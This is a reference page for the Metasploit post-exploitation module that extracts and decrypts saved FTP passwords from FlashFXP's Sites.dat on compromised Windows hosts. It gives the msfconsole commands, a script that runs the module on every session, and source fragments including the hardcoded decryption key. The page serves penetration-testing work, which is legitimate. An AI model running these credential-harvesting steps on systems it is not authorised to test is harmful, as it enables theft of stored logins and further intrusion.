Windows Gather FlashFXP Saved Password Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/flashfxp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather FlashFXP Saved Password Extraction
Module: post/windows/gather/credentials/flashfxp
Source code: modules/post/windows/gather/credentials/flashfxp.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It finds saved FTP connections in the Sites.dat file.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/flashfxp

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/flashfxp
msf post(flashfxp) > show options
    ... show and set options ...
msf post(flashfxp) > set SESSION session-id
msf post(flashfxp) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/flashfxp")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/flashfxp post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/flashfxp

msf6 post(windows/gather/credentials/flashfxp) > show info

       Name: Windows Gather FlashFXP Saved Password Extraction
     Module: post/windows/gather/credentials/flashfxp
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  theLightCosine <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts weakly encrypted saved FTP Passwords from 
  FlashFXP. It finds saved FTP connections in the Sites.dat file.

Module Options


This is a complete list of options available in the windows/gather/credentials/flashfxp post exploitation module:

msf6 post(windows/gather/credentials/flashfxp) > show options

Module options (post/windows/gather/credentials/flashfxp):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/flashfxp post exploitation module:

msf6 post(windows/gather/credentials/flashfxp) > show advanced

Module advanced options (post/windows/gather/credentials/flashfxp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/flashfxp module can do:

msf6 post(windows/gather/credentials/flashfxp) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/flashfxp post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/flashfxp) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

The following path could not be accessed or does not exist: <PATH>


Here is a relevant code snippet related to the "The following path could not be accessed or does not exist: <PATH>" error message:

59:	        next if sub =~ /^(\.|\.\.)$/
60:	
61:	        @fxppaths << "#{path}#{sub}\\Sites.dat"
62:	      end
63:	    rescue
64:	      print_error("The following path could not be accessed or does not exist: #{path}")
65:	    end
66:	  end
67:	
68:	  def get_ini(filename)
69:	    begin

Unable to parse file, may be encrypted using external password: <FILENAME>


Here is a relevant code snippet related to the "Unable to parse file, may be encrypted using external password: <FILENAME>" error message:

70:	      config = client.fs.file.new(filename, 'r')
71:	      parse = config.read
72:	      ini = Rex::Parser::Ini.from_s(parse)
73:	
74:	      if ini == {}
75:	        print_error("Unable to parse file, may be encrypted using external password: #{filename}")
76:	      end
77:	
78:	      ini.each_key do |group|
79:	        host = ini[group]['IP']
80:	        username = ini[group]['user']

Either could not find or could not open file <FILENAME>


Here is a relevant code snippet related to the "Either could not find or could not open file <FILENAME>" error message:

111:	        }
112:	
113:	        create_credential_login(login_data.merge(service_data))
114:	      end
115:	    rescue
116:	      print_status("Either could not find or could not open file #{filename}")
117:	    end
118:	  end
119:	
120:	  def decrypt(pwd)
121:	    key = "yA36zA48dEhfrvghGRg57h5UlDv3"

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • theLightCosine

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.